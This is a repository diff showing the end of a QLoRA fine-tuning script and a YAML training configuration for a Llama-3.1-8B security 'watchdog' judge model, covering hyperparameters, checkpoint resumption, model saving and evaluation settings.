| 208 |
+
|
| 209 |
+
# Training configuration optimized for DGX Spark
|
| 210 |
+
max_training_steps = 1500 # Total training steps for comprehensive dataset
|
| 211 |
+
|
| 212 |
+
training_args = TrainingArguments(
|
| 213 |
+
per_device_train_batch_size = 2, # Batch size per device
|
| 214 |
+
gradient_accumulation_steps = 4, # Effective batch size = 2 * 4 = 8
|
| 215 |
+
warmup_steps = 100, # Warmup for stable training
|
| 216 |
+
max_steps = max_training_steps, # Total training steps
|
| 217 |
+
learning_rate = 2e-4, # Learning rate for AdamW
|
| 218 |
+
fp16 = not torch.cuda.is_bf16_supported(),
|
| 219 |
+
bf16 = torch.cuda.is_bf16_supported(), # Use BF16 on DGX Spark
|
| 220 |
+
logging_steps = 1, # Log every step for progress tracking
|
| 221 |
+
optim = "adamw_8bit", # 8-bit Adam for memory efficiency
|
| 222 |
+
weight_decay = 0.01, # Regularization
|
| 223 |
+
lr_scheduler_type = "linear", # Linear learning rate decay
|
| 224 |
+
seed = 3407,
|
| 225 |
+
output_dir = "./outputs",
|
| 226 |
+
save_strategy = "steps",
|
| 227 |
+
save_steps = 250, # Save checkpoint every 250 steps
|
| 228 |
+
save_total_limit = 3, # Keep only 3 most recent checkpoints
|
| 229 |
+
report_to = "none", # Disable W&B/tensorboard
|
| 230 |
+
disable_tqdm = True, # Disable default tqdm (we have custom progress)
|
| 231 |
+
)
|
| 232 |
+
|
| 233 |
+
print("✓ Training configuration set")
|
| 234 |
+
print(f" - Effective batch size: {training_args.per_device_train_batch_size * training_args.gradient_accumulation_steps}")
|
| 235 |
+
print(f" - Total steps: {training_args.max_steps:,}")
|
| 236 |
+
print(f" - Learning rate: {training_args.learning_rate}")
|
| 237 |
+
print(f" - Dataset: Security (63%) + Judge (37%) = {len(dataset):,} examples")
|
| 238 |
+
print(f" - Estimated time: 4-6 hours (~10-15 sec/step)")
|
| 239 |
+
|
| 240 |
+
print("\n[5/6] Initializing SFTTrainer with progress tracking...")
|
| 241 |
+
|
| 242 |
+
# Create progress callback
|
| 243 |
+
progress_callback = ProgressCallback(total_steps=max_training_steps)
|
| 244 |
+
|
| 245 |
+
# Create trainer
|
| 246 |
+
trainer = SFTTrainer(
|
| 247 |
+
model = model,
|
| 248 |
+
tokenizer = tokenizer,
|
| 249 |
+
train_dataset = dataset,
|
| 250 |
+
dataset_text_field = "text",
|
| 251 |
+
max_seq_length = max_seq_length,
|
| 252 |
+
dataset_num_proc = 2,
|
| 253 |
+
packing = False, # Disable packing for clearer learning
|
| 254 |
+
args = training_args,
|
| 255 |
+
callbacks = [progress_callback],
|
| 256 |
+
)
|
| 257 |
+
|
| 258 |
+
print("✓ Trainer initialized with progress monitoring")
|
| 259 |
+
|
| 260 |
+
print("\n[6/6] Starting fine-tuning...")
|
| 261 |
+
|
| 262 |
+
# Check for existing checkpoints
|
| 263 |
+
checkpoint_dir = None
|
| 264 |
+
if os.path.exists("./outputs"):
|
| 265 |
+
checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
|
| 266 |
+
if checkpoints:
|
| 267 |
+
# Get the latest checkpoint by step number
|
| 268 |
+
latest_checkpoint = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
|
| 269 |
+
checkpoint_dir = os.path.join("./outputs", latest_checkpoint)
|
| 270 |
+
checkpoint_step = int(latest_checkpoint.split("-")[1])
|
| 271 |
+
|
| 272 |
+
print("="*80)
|
| 273 |
+
print("🔄 RESUMING FROM CHECKPOINT")
|
| 274 |
+
print("="*80)
|
| 275 |
+
print(f"Found checkpoint: {latest_checkpoint}")
|
| 276 |
+
print(f"Resuming from step: {checkpoint_step:,}/{max_training_steps:,}")
|
| 277 |
+
print(f"Remaining steps: {max_training_steps - checkpoint_step:,}")
|
| 278 |
+
print(f"Progress saved: {checkpoint_step/max_training_steps*100:.1f}%")
|
| 279 |
+
print("="*80 + "\n")
|
| 280 |
+
else:
|
| 281 |
+
print("="*80)
|
| 282 |
+
print("Training LLM-as-a-Judge Watchdog Model")
|
| 283 |
+
print(f"Total examples: {len(dataset):,} | Steps: {max_training_steps:,}")
|
| 284 |
+
print("Estimated duration: 4-6 hours (~10-15 sec/step)")
|
| 285 |
+
print("Monitor GPU: nvidia-smi")
|
| 286 |
+
print("="*80)
|
| 287 |
+
|
| 288 |
+
# Train the model with error handling
|
| 289 |
+
try:
|
| 290 |
+
if checkpoint_dir:
|
| 291 |
+
trainer_stats = trainer.train(resume_from_checkpoint=checkpoint_dir)
|
| 292 |
+
else:
|
| 293 |
+
trainer_stats = trainer.train()
|
| 294 |
+
progress_callback.crashed = False
|
| 295 |
+
except KeyboardInterrupt:
|
| 296 |
+
print("\n\n" + "="*80)
|
| 297 |
+
print("⚠️ TRAINING INTERRUPTED BY USER")
|
| 298 |
+
print("="*80)
|
| 299 |
+
|
| 300 |
+
# Find latest checkpoint
|
| 301 |
+
if os.path.exists("./outputs"):
|
| 302 |
+
checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
|
| 303 |
+
if checkpoints:
|
| 304 |
+
latest = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
|
| 305 |
+
step = int(latest.split("-")[1])
|
| 306 |
+
print(f"\n✓ Progress saved up to step {step:,}/{max_training_steps:,}")
|
| 307 |
+
print(f"✓ Checkpoint: ./outputs/{latest}")
|
| 308 |
+
print(f"\n🔄 To resume: Just run this script again")
|
| 309 |
+
print(f" Progress will automatically resume from step {step:,}")
|
| 310 |
+
else:
|
| 311 |
+
print("\n⚠️ No checkpoints found. Training was in early stages.")
|
| 312 |
+
print("="*80 + "\n")
|
| 313 |
+
progress_callback.crashed = True
|
| 314 |
+
raise
|
| 315 |
+
except Exception as e:
|
| 316 |
+
print("\n\n" + "="*80)
|
| 317 |
+
print("❌ TRAINING FAILED - ERROR DETECTED")
|
| 318 |
+
print("="*80)
|
| 319 |
+
print(f"Error: {str(e)}")
|
| 320 |
+
|
| 321 |
+
# Check for saved checkpoints
|
| 322 |
+
if os.path.exists("./outputs"):
|
| 323 |
+
checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
|
| 324 |
+
if checkpoints:
|
| 325 |
+
latest = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
|
| 326 |
+
step = int(latest.split("-")[1])
|
| 327 |
+
print(f"\n✓ Progress saved up to step {step:,}/{max_training_steps:,}")
|
| 328 |
+
print(f"✓ You can resume from: ./outputs/{latest}")
|
| 329 |
+
|
| 330 |
+
print("\nError details saved to: training_error.log")
|
| 331 |
+
with open("training_error.log", "w") as f:
|
| 332 |
+
f.write(f"Training failed at: {datetime.now()}\n")
|
| 333 |
+
f.write(f"Error: {str(e)}\n")
|
| 334 |
+
import traceback
|
| 335 |
+
f.write(traceback.format_exc())
|
| 336 |
+
print("="*80 + "\n")
|
| 337 |
+
progress_callback.crashed = True
|
| 338 |
+
raise
|
| 339 |
+
|
| 340 |
+
print("\n" + "="*80)
|
| 341 |
+
print("Fine-tuning completed!")
|
| 342 |
+
print("="*80)
|
| 343 |
+
|
| 344 |
+
print("\n[Saving] Saving fine-tuned model...")
|
| 345 |
+
|
| 346 |
+
# Save LoRA adapters
|
| 347 |
+
model.save_pretrained("./agentic-safety-foundation-sec-lora")
|
| 348 |
+
tokenizer.save_pretrained("./agentic-safety-foundation-sec-lora")
|
| 349 |
+
|
| 350 |
+
print("✓ LoRA adapters saved to: ./agentic-safety-foundation-sec-lora")
|
| 351 |
+
|
| 352 |
+
# Save merged model (optional - full precision)
|
| 353 |
+
print("\n[Saving] Merging and saving full model...")
|
| 354 |
+
model.save_pretrained_merged(
|
| 355 |
+
"./agentic-safety-foundation-sec-merged",
|
| 356 |
+
tokenizer,
|
| 357 |
+
save_method = "merged_16bit", # Save in 16-bit for quality
|
| 358 |
+
)
|
| 359 |
+
|
| 360 |
+
print("✓ Merged model saved to: ./agentic-safety-foundation-sec-merged")
|
| 361 |
+
|
| 362 |
+
print("\n" + "="*80)
|
| 363 |
+
print("Training Statistics:")
|
| 364 |
+
print("="*80)
|
| 365 |
+
print(trainer_stats)
|
| 366 |
+
|
| 367 |
+
print("\n✓ All outputs saved successfully!")
|
| 368 |
+
print("\nCheckpoint Information:")
|
| 369 |
+
print(" - Checkpoints saved every 250 steps to: ./outputs/")
|
| 370 |
+
print(" - Last 3 checkpoints are kept automatically")
|
| 371 |
+
print(" - To resume interrupted training: Just run this script again")
|
| 372 |
+
print("\nNext steps:")
|
| 373 |
+
print("1. Test the model with: python test_model.py")
|
| 374 |
+
print("2. Convert to GGUF for deployment (optional)")
|
| 375 |
+
print("3. Deploy with production_inference.py")
|
| 376 |
+
|
| 377 |
+
# Save the file and run it
|
| 378 |
+
# python finetune_foundation_sec.py
|
training_config.yaml
ADDED
|
@@ -0,0 +1,196 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Training Configuration - Foundation-Sec
|
| 2 |
+
|
| 3 |
+
# Model Configuration
|
| 4 |
+
base_model: "meta-llama/Llama-3.1-8B-Instruct"
|
| 5 |
+
model_type: "causal_lm"
|
| 6 |
+
torch_dtype: "float16"
|
| 7 |
+
attn_implementation: "flash_attention_2" # 2x faster than standard attention
|
| 8 |
+
|
| 9 |
+
# QLoRA Configuration
|
| 10 |
+
lora_config:
|
| 11 |
+
r: 64 # LoRA rank (higher = more parameters, better quality)
|
| 12 |
+
lora_alpha: 128 # LoRA scaling factor (typically 2x r)
|
| 13 |
+
lora_dropout: 0.1 # Dropout for LoRA layers
|
| 14 |
+
bias: "none" # Don't add bias terms
|
| 15 |
+
task_type: "CAUSAL_LM"
|
| 16 |
+
|
| 17 |
+
# Target modules for LoRA adaptation
|
| 18 |
+
target_modules:
|
| 19 |
+
- "q_proj" # Query projection
|
| 20 |
+
- "k_proj" # Key projection
|
| 21 |
+
- "v_proj" # Value projection
|
| 22 |
+
- "o_proj" # Output projection
|
| 23 |
+
- "gate_proj" # MLP gate
|
| 24 |
+
- "up_proj" # MLP up projection
|
| 25 |
+
- "down_proj" # MLP down projection
|
| 26 |
+
|
| 27 |
+
# Quantization Configuration (4-bit)
|
| 28 |
+
bnb_config:
|
| 29 |
+
load_in_4bit: true # Enable 4-bit quantization
|
| 30 |
+
bnb_4bit_quant_type: "nf4" # NormalFloat 4-bit
|
| 31 |
+
bnb_4bit_use_double_quant: true # Double quantization for efficiency
|
| 32 |
+
bnb_4bit_compute_dtype: "float16" # Compute in FP16
|
| 33 |
+
|
| 34 |
+
# Training Hyperparameters
|
| 35 |
+
training:
|
| 36 |
+
# Dataset
|
| 37 |
+
dataset_path: "datasets/training_data_v3_synthetic.jsonl"
|
| 38 |
+
max_seq_length: 2048 # Maximum sequence length
|
| 39 |
+
|
| 40 |
+
# Training schedule
|
| 41 |
+
num_epochs: 3 # Number of training epochs
|
| 42 |
+
max_steps: -1 # -1 = train for full epochs
|
| 43 |
+
|
| 44 |
+
# Batch size and accumulation
|
| 45 |
+
per_device_train_batch_size: 4 # Batch size per GPU
|
| 46 |
+
gradient_accumulation_steps: 4 # Effective batch = 4 * 4 = 16
|
| 47 |
+
|
| 48 |
+
# Optimization
|
| 49 |
+
learning_rate: 0.0002 # 2e-4 (standard for QLoRA)
|
| 50 |
+
weight_decay: 0.01 # L2 regularization
|
| 51 |
+
lr_scheduler_type: "cosine" # Cosine annealing
|
| 52 |
+
warmup_ratio: 0.03 # 3% warmup steps
|
| 53 |
+
|
| 54 |
+
# Optimizer
|
| 55 |
+
optimizer: "paged_adamw_8bit" # Memory-efficient AdamW
|
| 56 |
+
adam_beta1: 0.9
|
| 57 |
+
adam_beta2: 0.999
|
| 58 |
+
adam_epsilon: 1.0e-8
|
| 59 |
+
max_grad_norm: 1.0 # Gradient clipping
|
| 60 |
+
|
| 61 |
+
# Mixed precision
|
| 62 |
+
fp16: true # Enable FP16 training
|
| 63 |
+
bf16: false # BF16 not available on all GPUs
|
| 64 |
+
|
| 65 |
+
# Memory optimization
|
| 66 |
+
gradient_checkpointing: true # Reduces memory by 30-40%
|
| 67 |
+
optim: "paged_adamw_8bit" # Paged optimizer for memory efficiency
|
| 68 |
+
|
| 69 |
+
# Logging and Checkpointing
|
| 70 |
+
logging:
|
| 71 |
+
logging_dir: "logs/training"
|
| 72 |
+
logging_strategy: "steps"
|
| 73 |
+
logging_steps: 50 # Log every 50 steps
|
| 74 |
+
|
| 75 |
+
report_to: "tensorboard" # Or "wandb" for Weights & Biases
|
| 76 |
+
|
| 77 |
+
# Evaluation during training
|
| 78 |
+
evaluation_strategy: "steps" # Evaluate periodically
|
| 79 |
+
eval_steps: 500 # Evaluate every 500 steps
|
| 80 |
+
per_device_eval_batch_size: 8 # Larger batch for eval (no gradients)
|
| 81 |
+
|
| 82 |
+
# Checkpointing
|
| 83 |
+
save_strategy: "steps"
|
| 84 |
+
save_steps: 500 # Save checkpoint every 500 steps
|
| 85 |
+
save_total_limit: 3 # Keep only last 3 checkpoints
|
| 86 |
+
load_best_model_at_end: true # Load best checkpoint at end
|
| 87 |
+
metric_for_best_model: "eval_loss" # Metric to determine best model
|
| 88 |
+
greater_is_better: false # Lower loss is better
|
| 89 |
+
|
| 90 |
+
# Output Configuration
|
| 91 |
+
output:
|
| 92 |
+
output_dir: "output_models/foundation-sec-v3"
|
| 93 |
+
overwrite_output_dir: false # Don't overwrite existing checkpoints
|
| 94 |
+
push_to_hub: false # Set to true to push to HuggingFace
|
| 95 |
+
hub_model_id: "guerilla7/Foundation-Sec-8B-Instruct"
|
| 96 |
+
hub_strategy: "every_save" # Push on every checkpoint
|
| 97 |
+
|
| 98 |
+
# Data Processing
|
| 99 |
+
data:
|
| 100 |
+
# Preprocessing
|
| 101 |
+
num_proc: 8 # Parallel preprocessing workers
|
| 102 |
+
streaming: false # Load full dataset into memory
|
| 103 |
+
|
| 104 |
+
# Data formatting
|
| 105 |
+
formatting_func: "format_chat_template" # Use Llama 3.1 chat template
|
| 106 |
+
response_template: "<|start_header_id|>assistant<|end_header_id|>"
|
| 107 |
+
|
| 108 |
+
# Validation split
|
| 109 |
+
validation_split: 0.05 # 5% for validation
|
| 110 |
+
seed: 42 # Random seed for reproducibility
|
| 111 |
+
|
| 112 |
+
# Performance Optimization
|
| 113 |
+
performance:
|
| 114 |
+
# DataLoader
|
| 115 |
+
dataloader_num_workers: 8 # Parallel data loading
|
| 116 |
+
dataloader_pin_memory: true # Pin memory for faster GPU transfer
|
| 117 |
+
dataloader_prefetch_factor: 2 # Prefetch batches
|
| 118 |
+
|
| 119 |
+
# Distributed training (if multi-GPU)
|
| 120 |
+
ddp_find_unused_parameters: false
|
| 121 |
+
ddp_backend: "nccl" # NVIDIA Collective Communications Library
|
| 122 |
+
|
| 123 |
+
# Compilation (PyTorch 2.0+)
|
| 124 |
+
torch_compile: false # Set to true for 10-20% speedup
|
| 125 |
+
|
| 126 |
+
# Gradient accumulation optimization
|
| 127 |
+
gradient_accumulation_kwargs:
|
| 128 |
+
use_reentrant: false # More memory efficient
|
| 129 |
+
|
| 130 |
+
# Hardware Configuration
|
| 131 |
+
hardware:
|
| 132 |
+
# GPU settings
|
| 133 |
+
device_map: "auto" # Automatic device placement
|
| 134 |
+
max_memory:
|
| 135 |
+
0: "95GB" # Reserve 1GB for system overhead
|
| 136 |
+
|
| 137 |
+
# CUDA settings
|
| 138 |
+
cuda_visible_devices: "0" # Use first GPU only
|
| 139 |
+
|
| 140 |
+
# Environment variables (set in shell)
|
| 141 |
+
# PYTORCH_CUDA_ALLOC_CONF: "max_split_size_mb:512"
|
| 142 |
+
# TOKENIZERS_PARALLELISM: "false"
|
| 143 |
+
# VLLM_USE_TRITON_FLASH_ATTN: "0"
|
| 144 |
+
# VLLM_ATTENTION_BACKEND: "TORCH_SDPA"
|
| 145 |
+
|
| 146 |
+
# Reproducibility
|
| 147 |
+
reproducibility:
|
| 148 |
+
seed: 42
|
| 149 |
+
deterministic: false # Set to true for full reproducibility (slower)
|
| 150 |
+
|
| 151 |
+
# Advanced Settings
|
| 152 |
+
advanced:
|
| 153 |
+
# Experimental features
|
| 154 |
+
use_flash_attention_2: true # Enable Flash Attention 2
|
| 155 |
+
use_cache: false # Disable KV cache during training
|
| 156 |
+
|
| 157 |
+
# DeepSpeed (optional, for multi-GPU)
|
| 158 |
+
deepspeed: null # Path to DeepSpeed config if needed
|
| 159 |
+
|
| 160 |
+
# FSDP (optional, for very large models)
|
| 161 |
+
fsdp: null # Fully Sharded Data Parallel config
|
| 162 |
+
|
| 163 |
+
# Custom Evaluation
|
| 164 |
+
custom_eval:
|
| 165 |
+
# Run custom evaluation after training
|
| 166 |
+
enabled: true
|
| 167 |
+
|
| 168 |
+
# MMLU Security Studies
|
| 169 |
+
mmlu:
|
| 170 |
+
enabled: true
|
| 171 |
+
tasks: ["mmlu_security_studies"]
|
| 172 |
+
batch_size: 16
|
| 173 |
+
|
| 174 |
+
# Custom MCQA
|
| 175 |
+
mcqa:
|
| 176 |
+
enabled: true
|
| 177 |
+
task_file: "configs/cybersecurity_mcqa.yaml"
|
| 178 |
+
batch_size: 16
|
| 179 |
+
|
| 180 |
+
# Trace Security
|
| 181 |
+
trace_security:
|
| 182 |
+
enabled: true
|
| 183 |
+
benign_traces: "evaluation/benign_traces.json"
|
| 184 |
+
malicious_traces: "evaluation/malicious_traces.json"
|
| 185 |
+
|
| 186 |
+
# Notes
|
| 187 |
+
# ------
|
| 188 |
+
# Total parameters: ~8B
|
| 189 |
+
# Trainable parameters: ~33.5M (0.4% via QLoRA)
|
| 190 |
+
# Peak memory usage: ~24GB VRAM
|
| 191 |
+
# Training time: ~8 hours on NVIDIA Blackwell GPU
|
| 192 |
+
# Dataset: 80,851 examples
|
| 193 |
+
# Effective batch size: 16 (4 per device × 4 accumulation)
|
| 194 |
+
# Total training steps: ~15,000 (80,851 / 16 * 3 epochs)
|
| 195 |
+
# GPU utilization: ~85-95%
|
| 196 |
+
# Expected final loss: ~0.45-0.55
|